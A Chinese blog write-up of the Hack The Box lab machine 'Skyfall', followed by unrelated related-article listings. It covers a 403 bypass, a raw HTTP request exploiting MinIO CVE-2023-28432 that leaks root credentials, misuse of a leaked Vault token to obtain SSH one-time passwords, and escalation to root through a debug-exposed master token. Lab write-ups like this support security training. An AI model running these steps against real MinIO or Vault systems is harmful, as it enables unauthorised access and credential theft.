Hack The Box-Skyfall

已于 2024-02-06 09:59:09 修改
阅读量2.2k 收藏 9
点赞数 19
分类专栏: HTB靶场合集 文章标签: hackthebox 提权 linux 靶场
于 2024-02-04 17:45:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52742680/article/details/136020022
版权

信息收集&端口利用

使用nmap对端口进行扫描

nmap 10.10.11.254

在这里插入图片描述

访问80端口

在这里插入图片描述

没有可以利用的漏洞点,尝试目录扫描和子域名收集

目录扫描没有发现有价值的利用点

在这里插入图片描述

但是子域名扫描找到一个demo环境,将其添加进hosts文件后访问

在这里插入图片描述

界面中有提示访客用户名和密码,先尝试登录

在这里插入图片描述

在这里插入图片描述

该系统是一个minIO的对象存储系统,点击MinIO Metrics,虽然提示403禁止,但是经过403bypass后发现可以在末尾加上%0a的方式绕过

在这里插入图片描述

在最下方有一段新的域名

在这里插入图片描述

加入到hosts文件中,访问之

在这里插入图片描述

注意到MinIO有一个信息泄露漏洞CVE-2023-28432,利用漏洞能够查看到敏感信息,利用方式为

POST /minio/bootstrap/v1/verify HTTP/1.1

Host: ip:9000

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

效果如下图所示

在这里插入图片描述

获取到的敏感信息为

"MINIO_ROOT_USER":"5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD":"GkpjkmiVmpFuL2d3oRx0"
"MINIO_UPDATE_MINISIGN_PUBKEY":"RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav"

接下去使用MinIO Admin Client对MinIO容器进行管理

安装MinIO Admin Client

curl https://dl.min.io/client/mc/release/linux-amd64/mc \
	--create-dirs \
	-o $HOME/minio-binaries/mc
chmod +x $HOME/minio-binaries/mc
export PATH=$PATH:$HOME/minio-binaries/

安装完成后,利用之前拿到的用户名和密码将容器桶加入到自定义容器中

mc alias set myminio http://prd23-s3-backend.skyfall.htb 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

myminio的名字为自定义,现在已经将他们容器桶中的数据导入进了我们的容器桶,查看有哪些内容

在这里插入图片描述

将容器桶内的文件都打包到本地进行查看

mc cp --recursive myminio/askyy/home_backup.tar.gz ./home_backup.tar.gz

在这里插入图片描述

查看压缩包中的文件

在这里插入图片描述

发现该文件为最新版本,缺少很多信息,因此选择下载旧的版本

mc cp --vid 3c498578-8dfe-43b7-b679-32a3fe42018f myminio/askyy/home_backup.tar.gz ./down.tar.gz
tar -xzvf down.tar.gz

在这里插入图片描述

在这里插入图片描述

翻阅文件后查看到有ssh私钥文件

在这里插入图片描述

但是无法登录到主机

继续翻阅文件后,在容器桶内的第二个压缩包中的.bashrc文件发现了另外一个域名地址

在这里插入图片描述

VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

由泄露的信息为VAULT_API_ADDR和VAULT_TOKEN猜测,此次登录ssh的方式为Vault+OTP(One-Time Password)

Vault登录ssh

Vault提供了一种创建一次性登陆密码的方式,它的工作原理如图:

在这里插入图片描述

首先我们需要在被登陆的服务器上配置vault-ssh-helper程序,它可以取代Linux默认的登陆验证程序,在用户传递了登陆用户名密码后,转而向Vault服务器请求验证用户名密码的正确性。用户首先登陆Vault,通过Vault创建一个属于目标服务器的otp,随后远程连接目标服务器,给出这组otp,在vault-ssh-helper验证通过后成功登陆,同时Vault服务器会在成功验证后删除这个otp,确保密码的确是一次性的。

下载工具

https://developer.hashicorp.com/vault/install?product_intent=vault#Linux

将配置文件导入进vault

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

验证token值是否有效

在这里插入图片描述

登录成功,下一步创建一个key_type参数设置为otp的角色;角色的CIDR列表所代表的所有计算机都应正确安装和配置助手

curl \
--header "X-Vault-Token: $VAULT_TOKEN" \
--request POST \
--data '{"ip":"10.10.11.254", "username":"askyy"}' \
$VAULT_ADDR/v1/ssh/creds/dev_otp_key_role

在这里插入图片描述

如图所示代表添加成功,使用该用户登录到ssh

./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

在这里插入图片描述

出现这个界面表示需要通过OTP来登录,OTP的值已经由session给出,只需要将其复制到密码框即可

在这里插入图片描述

权限提升

查看当前用户能够执行的权限

在这里插入图片描述

-------------------------------------------------------更新分界线---------------------------------------------------------------

以root身份运行该程序

在这里插入图片描述

输出中说明了找到了Master token,但是需要启动debug模式来查看详情

在当前目录创建一个debug.log文件,并将其权限都修改为askyy

在这里插入图片描述

将调试模式的输出输出到我们创建的debug.log文件,并查看

在这里插入图片描述

能够获取到Master token值,再联想到本题获取user用户的权限,提权方式为修改vault环境变量token值,再添加一个root用户使用OTP登录

修改当前vault环境的token值

在这里插入图片描述

再添加一个admin用户(注意之前添加的是dev用户)

curl \
	--header "X-Vault-Token: $VAULT_TOKEN" \
	--request POST \
	--data '{"ip":"10.10.11.254", "username":"root"}' \ 
	$VAULT_ADDR/v1/ssh/creds/admin_otp_key_role

使用vault的admin用户模式去登录

在这里插入图片描述

提权成功

Str4w_AShiR
关注
  • 19
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【1day】复现CVE-2023-28432(MinIO信息泄露漏洞)
记录并分享学习安全的知识点..
04-13 1369
复现CVE-2023-28432(MinIO信息泄露漏洞)
skyfall-api:用于管理 API 的 Skyfall 模块
07-11
Skyfall-API 是一个基于 JavaScript 开发的模块,主要用于管理和操控 API。这个工具为开发者提供了一套便捷的接口,使得在应用程序中对 API 的调用、监控和管理变得更加简单。通过 Skyfall-API,开发者可以更有效地...
MinIO从信息泄漏到RCE
Innocence_0的博客
02-29 452
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10
nnn2188185的博客
04-08 6728
MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。 CVE-2023-28432 CNNVD-202303-1795
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 5675
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
docker 部署
aileen5150的博客
09-09 188
.env COMPOSE_PROJECT_NAME=projectname VOLUME_PATH=/volume/projectname/app deploy.sh #!/bin/bash usage () { echo "Usage: launcher COMMAND [--docker-args STRING]" echo "Commands:" echo " create: Initialize the container" echo " st
【漏洞复现】MinIO敏感信息泄露(CVE-2023-28432
刘家华(游戏开发)
04-23 1152
MinIO发现了信息泄露漏洞
yorbit:这是NASA Spaces Challenge Project Skyfall的资料库
04-29
yorbit是NASA Spaces Challenge Project Skyfall的资料库,它是一个基于PHP开发的项目,旨在解决特定的挑战,可能与模拟航天器轨道、太空探索或相关的技术问题有关。在这个压缩包中,"yorbit-master"是主目录,通常...
skyfall:Javascript 库,可按需为站点添加故障效果
05-30
Skyfall.js 为任何带有 div 的网站添加整洁的分解效果。 可以在示例 用法 下载 .js 文件并将其放置在您的网页目录中。 在正文的底部添加以下内容。 [removed][removed] 将以下类添加到要在单击时触发的按钮或...
VSCO Lightroom 预设
08-19
1. the-wall 这个预设提供了冷暖色调的平衡,让人想起过去的时代。使用暗淡的高光,感觉就像您的图像是从电影中提取的。 2. mensch-maschine 具有崇高的阴影,可产生令人惊叹的晕影,突出照片中的绿色调。 3. ...
Mino环境搭建
aileen5150的博客
06-09 1104
Minio环境搭建 1. 说明 1.1 简介 MinIO 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。 MinIO与传统的存储和其他的对象存储不同的是:它一开始就针对性能要求更高的私有云标准进行软件架构设计。因为MinIO一开始就只为对象存储而设计。所以他采用了更易用的方式进行设计,它能实现对象存储所需要的全部功能,在性能上也更加强劲,它不会为了更多的业务功能而妥协,失去MinIO的易用性、高效性。 这样的结果所带来
MinIO安装及使用教程(windows) 及java 上传 下载 windows minio 修改密码修改 MINIO_ACCESS_KEY minio开机启动
正怒月神的博客
06-09 3632
1.下载安装地址(我下的是windows版本):https://min.io/download#/windows 2.新建一个目录存放minio文件,我建的文件名叫 D:\minioData,CMD进入刚刚下载的minio.exe所在目录, 直接在cmd下运行:minio.exe server D:\minioData 启动成功以后如下图(启动就是这么简单),最后红色字提示修改access Key和Secret Key (默认全是minioadmin) 3.浏览器打开...
Linux中的环境变量
qhy850716的博客
07-17 497
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
定制 Linux 内核的意义
地球空间
07-17 307
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
最新发布
Starry的博客
07-19 1168
COD 原理,CTRL9,自检(详细代码示例)
Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4289
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
linux centos nginx 报错 client intended to send too large body: 104853014 bytes问题
qq_42250832的博客
07-17 352
这个错误通常发生在Web服务器处理HTTP请求时,当客户端尝试发送的请求体(body)大小超过了服务器配置的限制时。错误信息 “client intended to send too large body: 104853014 bytes” 表示客户端想要发送的数据量超过了100MB,这通常是由于客户端尝试上传一个非常大的文件或者提交了一个非常大的表单。增加服务器接收请求体的大小限制。这通常可以通过配置文件来实现,例如,如果你使用的是Nginx,可以修改client_max_body_size指令。
springboot-3-整合ehcache缓存
05-17
在Spring Boot中整合Ehcache缓存,需要进行以下几个步骤: 1. 添加Ehcache依赖 在pom.xml文件中添加Ehcache依赖: ``` <dependency> <groupId>net.sf.ehcache</groupId> <artifactId>ehcache</artifactId> <version>${ehcache.version}</version> </dependency> ``` 2. 配置Ehcache缓存 在application.yml(或application.properties)文件中配置Ehcache缓存: ``` spring: cache: type: ehcache ehcache: config: classpath:ehcache.xml ``` 其中,`spring.cache.type`属性指定使用的缓存类型为Ehcache,`ehcache.config`属性指定Ehcache配置文件的路径(在classpath下)。 3. 编写Ehcache配置文件 在classpath下创建`ehcache.xml`文件,配置Ehcache缓存的相关信息: ``` <ehcache> <diskStore path="java.io.tmpdir"/> <defaultCache maxEntriesLocalHeap="10000" eternal="false" timeToIdleSeconds="120" timeToLiveSeconds="120" diskSpoolBufferSizeMB="30" maxEntriesLocalDisk="10000000" diskExpiryThreadIntervalSeconds="120" memoryStoreEvictionPolicy="LRU" transactionalMode="off"> </defaultCache> <cache name="userCache" maxEntriesLocalHeap="1000" maxEntriesLocalDisk="10000" eternal="false" diskSpoolBufferSizeMB="20" timeToIdleSeconds="300" timeToLiveSeconds="600" memoryStoreEvictionPolicy="LFU" transactionalMode="off"> </cache> </ehcache> ``` 其中,`defaultCache`为默认缓存配置,`cache`为自定义缓存配置。 4. 在代码中使用缓存 在需要使用缓存的方法上添加`@Cacheable`注解,指定缓存名称和缓存key: ``` @Service public class UserServiceImpl implements UserService { @Autowired private UserDao userDao; @Override @Cacheable(value = "userCache", key = "#id") public User getUserById(Integer id) { return userDao.getUserById(id); } // ... } ``` 其中,`value`属性指定缓存名称,`key`属性为缓存key表达式,可以使用Spring表达式语言(SpEL)进行动态表达。 以上就是在Spring Boot中整合Ehcache缓存的步骤,通过使用Ehcache缓存可以有效地提高应用程序的性能和响应速度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值